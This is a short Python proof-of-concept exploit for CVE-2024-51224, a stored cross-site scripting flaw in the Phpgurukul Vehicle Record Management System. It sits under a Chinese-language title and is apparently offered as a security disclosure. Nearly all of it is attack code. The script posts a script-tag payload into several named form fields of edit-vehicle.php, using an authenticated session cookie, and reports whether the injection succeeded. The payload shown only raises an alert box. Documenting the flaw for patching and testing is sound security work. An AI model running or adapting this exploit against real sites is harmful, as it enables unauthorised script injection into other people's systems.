CVE-2024-51224 Phpgurukul车辆管理系统XSS漏洞

# POC for CVE-2024-51224 # Target: Phpgurukul Vehicle Record Management System v1.0 # Description: Stored XSS via edit-vehicle.php parameters import requests target_url = "http://target-site/admin/edit-vehicle.php" # The payload attempts to execute an alert box via script tag payload = "<script>alert('CVE-2024-51224');</script>" # Data to be sent in the POST request # Vulnerable parameters: vehiclename, modelnumber, regnumber, vehiclesubtype, chasisnum, enginenumber data = { "vehiclename": payload, "modelnumber": "Test123", "regnumber": payload, "vehiclesubtype": "Sedan", "chasisnum": payload, "enginenumber": "Eng123", "update": "Update" } # Attacker must be authenticated (High Privileges required) cookies = { "PHPSESSID": "attacker_session_id_here" } response = requests.post(target_url, data=data, cookies=cookies) if response.status_code == 200: print("Payload injected successfully. Check the vehicle list page.") else: print("Failed to inject payload.")